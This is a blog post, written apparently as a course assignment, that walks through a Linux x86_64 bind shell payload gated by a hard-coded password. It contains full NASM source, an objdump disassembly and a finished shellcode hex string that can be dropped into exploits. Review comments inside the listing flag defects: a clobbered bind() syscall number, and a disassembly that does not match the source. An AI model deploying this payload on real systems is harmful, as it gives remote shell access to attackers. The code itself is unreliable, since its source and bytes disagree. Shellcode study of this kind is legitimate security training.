Sunday, May 7, 2017

Linux x86_64 Bind Shell w/ password

Here is the second assignment for the x86_64 Assembly and Shellcoding Expert (SLAE64) certification. The goal of the assignment was to write a bind shell that requires a password to use. This one was a bit more difficult than the reverse shell in my opinion. The shell itself wasn't too bad, but the whole password thing took me a bit to get right. The shell kept hanging after it executed and wouldn't respond to input. Not exactly sure what was wrong, but it worked after starting from scratch a second time. I'm sure the issue was somewhere in the read() syscall.


;-----------------------------------------------------------------------
; Linux x86_64 bind shell gated by an 8-byte password (SLAE64 assignment 2).
; Syntax: NASM / Intel.  ABI: raw Linux syscalls (rax = number; args in
; rdi, rsi, rdx; syscall clobbers rcx and r11).  _start is the process
; entry point, not a callable function, and nothing here returns.
;
; Register roles across the listing:
;   rdi  listening socket fd after socket(); client fd after the xchg below
;   r9   client fd returned by accept() (swapped into rdi afterwards)
;   rsi  sockaddr pointer for bind/accept, then the dup2 target-fd counter
;   rsp  every structure (sockaddr_in, password buffer, execve argv) lives
;        on the stack; no .data section is used
;
; NOTE(review): the objdump shown further down this page ends with an
; extra <Exit> block after the execve syscall that is not present in this
; source listing, so the object disassembled there is not byte-for-byte
; this text.
;-----------------------------------------------------------------------
global _start
section .text

_start:

 ; sock = socket(AF_INET, SOCK_STREAM, 0)
 ; AF_INET = 2
 ; SOCK_STREAM = 1
 ; syscall number 41 
 ; Byte-sized moves into al/dil/sil keep the encoding free of NUL bytes.

 xor rax, rax
 mov al, 41
 xor rdi, rdi 
 mov dil, 2
 xor rsi, rsi 
 mov sil, 1
 xor rdx, rdx 
 syscall

 ; copy socket descriptor to rdi for future use 
 ; (no error check: a negative rax from socket() would be used as the fd)

 mov rdi, rax


 ; server.sin_family = AF_INET 
 ; server.sin_port = htons(PORT)
 ; server.sin_addr.s_addr = INADDR_ANY
 ; bzero(&server.sin_zero, 8)
 ;
 ; The struct is written below rsp, then rsp is lowered onto it:
 ;   [rsp-8]  sin_family low byte = 2 (only one byte is written, so the
 ;            byte at [rsp-7] keeps whatever was already on the stack)
 ;   [rsp-6]  sin_port = 0x5c11, i.e. 0x115c = 4444 in network byte order
 ;   [rsp-4]  sin_addr = 0 (INADDR_ANY)
 ;   [rsp]    sin_zero = the 8 zero bytes from the push

 xor rax, rax 
 push rax
 mov dword [rsp-4], eax
 mov word [rsp-6], 0x5c11          ; port 4444
 mov byte [rsp-8], 0x2
 sub rsp, 8                        ; rsp now points at sin_family


 ; bind(sock, (struct sockaddr *)&server, sockaddr_len)
 ; syscall number 49
 ;
 ; NOTE(review): `mov al, 16` below rewrites the syscall number loaded two
 ; instructions earlier, so rax is 16, not 49, when syscall executes, and
 ; rdx (the address length) is still 0.  The bind() described in this
 ; comment is therefore not what this syscall dispatches.

 xor rax, rax
 mov al, 49
 
 mov rsi, rsp
 xor rdx, rdx 
 mov al, 16
 syscall


 ; listen(sock, MAX_CLIENTS)
 ; syscall number 50
 ; rdi still holds the fd returned by socket() above.
 
 xor rax, rax
 mov al, 50
 xor rsi, rsi 
 mov sil, 2
 syscall


 ; new = accept(sock, (struct sockaddr *)&client, &sockaddr_len)
 ; syscall number 43
 ; 16 bytes of stack are reserved for the client address, and a qword
 ; holding 16 is pushed to act as the in/out address-length argument.

 
 xor rax, rax
 mov al, 43
 sub rsp, 16
 mov rsi, rsp
 push 16
 mov rdx, rsp
 syscall

 mov r9, rax                     ; store the client socket description 
 xor rax, rax                    ; close parent      
 mov al, 3                       ; close(rdi): rdi is still the listening socket
 syscall

 xchg rdi , r9                   ; rdi = client fd, r9 = the (closed) listening fd
 xor rsi , rsi                   ; rsi = dup2 target fd, starting at 0

 ; duplicate sockets
 ;
 ; dup2(client, rsi) for rsi = 0 and 1.  `loopne` falls through as soon as
 ; `cmp rsi, 2` sets ZF, which happens right after the inc that makes rsi
 ; equal 2, so fd 2 (stderr) is never duplicated onto the socket.
 ; `loopne` also decrements rcx and would stop at rcx == 0; rcx holds
 ; whatever the preceding syscall left in it (syscall clobbers rcx), so the
 ; loop relies on that value being non-zero -- presumably always true here,
 ; but not checked.

dup2:
 push 0x21                       ; 0x21 = 33 = dup2
 pop rax
 syscall
 inc rsi
 cmp rsi , 0x2
 loopne dup2


 ; Password gate: read(0, buf, 16) -- fd 0 is the client socket after the
 ; dup2 loop -- then compare the first 8 bytes of buf with "Password" as
 ; a single qword.  Only those 8 bytes are examined: bytes 9-16 of the
 ; buffer, the read() return value (short read or error) and any trailing
 ; newline are all ignored.
Checkpass:
     
 xor rax , rax                ; syscall 0 = read
 push 0x10
 pop rdx                      ; rdx = 16 = count
 sub rsp , 16                 ; 16 bytes to receive user input 
 mov rsi , rsp
 xor edi , edi                ; fd 0
 syscall                      ; read()
 mov rax , 0x64726f7773736150 ; "Password"
 lea rdi , [rel rsi]          ; rdi = rsi (assembles to a plain lea rdi,[rsi], see objdump below)
 scasq                        ; ZF = (rax == qword [rdi]); rdi advances by 8
 jz Shell
 push 0x3c                    ; mismatch: exit(), syscall 60
 pop rax
 syscall                      ; rdi (the status) is the advanced buffer pointer, not a meaningful exit code
 
 ; execve("/bin//sh", argv, envp): argv = {"/bin//sh", NULL} and envp
 ; points at a NULL qword (empty environment), all built on the stack.
Shell:

 xor rax, rax                   ; First NULL push
 push rax
 mov rbx, 0x68732f2f6e69622f    ; push /bin//sh in reverse
 push rbx
 mov rdi, rsp                   ; store /bin//sh address in RDI
 push rax                       ; Second NULL push
 mov rdx, rsp                   ; set RDX (envp -> NULL)
 push rdi                       ; Push address of /bin//sh
 mov rsi, rsp                   ; set RSI (argv -> {path, NULL})

 
 ; Call the Execve syscall
 ; rax is still 0 here, so the add yields 59 = execve.  Nothing follows
 ; the syscall in this listing: if execve fails, execution runs into
 ; whatever bytes come next in memory.

 add rax, 59
 syscall

 

Compile it with nasm

nasm -f elf64 MyBindShell.nasm -o bindshell.o

Looking for nulls in objdump

objdump -d bindshell.o -M intel

bindshell.o:     file format elf64-x86-64

Disassembly of section .text:

0000000000000000 <_start>:
   0:    48 31 c0                 xor    rax,rax
   3:    b0 29                    mov    al,0x29
   5:    48 31 ff                 xor    rdi,rdi
   8:    40 b7 02                 mov    dil,0x2
   b:    48 31 f6                 xor    rsi,rsi
   e:    40 b6 01                 mov    sil,0x1
  11:    48 31 d2                 xor    rdx,rdx
  14:    0f 05                    syscall
  16:    48 89 c7                 mov    rdi,rax
  19:    48 31 c0                 xor    rax,rax
  1c:    50                       push   rax
  1d:    89 44 24 fc              mov    DWORD PTR [rsp-0x4],eax
  21:    66 c7 44 24 fa 11 5c     mov    WORD PTR [rsp-0x6],0x5c11
  28:    c6 44 24 f8 02           mov    BYTE PTR [rsp-0x8],0x2
  2d:    48 83 ec 08              sub    rsp,0x8
  31:    48 31 c0                 xor    rax,rax
  34:    b0 31                    mov    al,0x31
  36:    48 89 e6                 mov    rsi,rsp
  39:    48 31 d2                 xor    rdx,rdx
  3c:    b0 10                    mov    al,0x10
  3e:    0f 05                    syscall
  40:    48 31 c0                 xor    rax,rax
  43:    b0 32                    mov    al,0x32
  45:    48 31 f6                 xor    rsi,rsi
  48:    40 b6 02                 mov    sil,0x2
  4b:    0f 05                    syscall
  4d:    48 31 c0                 xor    rax,rax
  50:    b0 2b                    mov    al,0x2b
  52:    48 83 ec 10              sub    rsp,0x10
  56:    48 89 e6                 mov    rsi,rsp
  59:    6a 10                    push   0x10
  5b:    48 89 e2                 mov    rdx,rsp
  5e:    0f 05                    syscall
  60:    49 89 c1                 mov    r9,rax
  63:    48 31 c0                 xor    rax,rax
  66:    b0 03                    mov    al,0x3
  68:    0f 05                    syscall
  6a:    49 87 f9                 xchg   r9,rdi
  6d:    48 31 f6                 xor    rsi,rsi

0000000000000070 <dup2>:
  70:    6a 21                    push   0x21
  72:    58                       pop    rax
  73:    0f 05                    syscall
  75:    48 ff c6                 inc    rsi
  78:    48 83 fe 02              cmp    rsi,0x2
  7c:    e0 f2                    loopne 70 <dup2>

000000000000007e <Checkpass>:
  7e:    48 31 c0                 xor    rax,rax
  81:    6a 10                    push   0x10
  83:    5a                       pop    rdx
  84:    48 83 ec 10              sub    rsp,0x10
  88:    48 89 e6                 mov    rsi,rsp
  8b:    31 ff                    xor    edi,edi
  8d:    0f 05                    syscall
  8f:    48 b8 50 61 73 73 77     movabs rax,0x64726f7773736150
  96:    6f 72 64
  99:    48 8d 3e                 lea    rdi,[rsi]
  9c:    48 af                    scas   rax,QWORD PTR es:[rdi]
  9e:    74 05                    je     a5 <Shell>
  a0:    6a 3c                    push   0x3c
  a2:    58                       pop    rax
  a3:    0f 05                    syscall

00000000000000a5 <Shell>:
  a5:    48 31 c0                 xor    rax,rax
  a8:    50                       push   rax
  a9:    48 bb 2f 62 69 6e 2f     movabs rbx,0x68732f2f6e69622f
  b0:    2f 73 68
  b3:    53                       push   rbx
  b4:    48 89 e7                 mov    rdi,rsp
  b7:    50                       push   rax
  b8:    48 89 e2                 mov    rdx,rsp
  bb:    57                       push   rdi
  bc:    48 89 e6                 mov    rsi,rsp
  bf:    48 83 c0 3b              add    rax,0x3b
  c3:    0f 05                    syscall

00000000000000c5 <Exit>:
  c5:    6a 3c                    push   0x3c
  c7:    58                       pop    rax
  c8:    48 31 ff                 xor    rdi,rdi
  cb:    0f 05                    syscall

No nulls! Time to pull the hex out of the objdump output.


# Same extraction without the word-splitting loop: one byte per line, prefix each with \x, then join.
objdump -d bindshell.o -M intel | grep '^ ' | cut -f2 | tr -s ' \n' '\n' | sed 's/^/\\x/' | tr -d '\n'; echo

\x48\x31\xc0\xb0\x29\x48\x31\xff\x40\xb7\x02\x48\x31\xf6\x40\xb6\x01\x48\x31\xd2\x0f\x05\x48\x89\xc7\x48\x31\xc0\x50\x89\x44\x24\xfc\x66\xc7\x44\x24\xfa\x11\x5c\xc6\x44\x24\xf8\x02\x48\x83\xec\x08\x48\x31\xc0\xb0\x31\x48\x89\xe6\x48\x31\xd2\xb0\x10\x0f\x05\x48\x31\xc0\xb0\x32\x48\x31\xf6\x40\xb6\x02\x0f\x05\x48\x31\xc0\xb0\x2b\x48\x83\xec\x10\x48\x89\xe6\x6a\x10\x48\x89\xe2\x0f\x05\x49\x89\xc1\x48\x31\xc0\xb0\x03\x0f\x05\x49\x87\xf9\x48\x31\xf6\x6a\x21\x58\x0f\x05\x48\xff\xc6\x48\x83\xfe\x02\xe0\xf2\x48\x31\xc0\x6a\x10\x5a\x48\x83\xec\x10\x48\x89\xe6\x31\xff\x0f\x05\x48\xb8\x50\x61\x73\x73\x77\x6f\x72\x64\x48\x8d\x3e\x48\xaf\x74\x05\x6a\x3c\x58\x0f\x05\x48\x31\xc0\x50\x48\xbb\x2f\x62\x69\x6e\x2f\x2f\x73\x68\x53\x48\x89\xe7\x50\x48\x89\xe2\x57\x48\x89\xe6\x48\x83\xc0\x3b\x0f\x05\x6a\x3c\x58\x48\x31\xff\x0f\x05

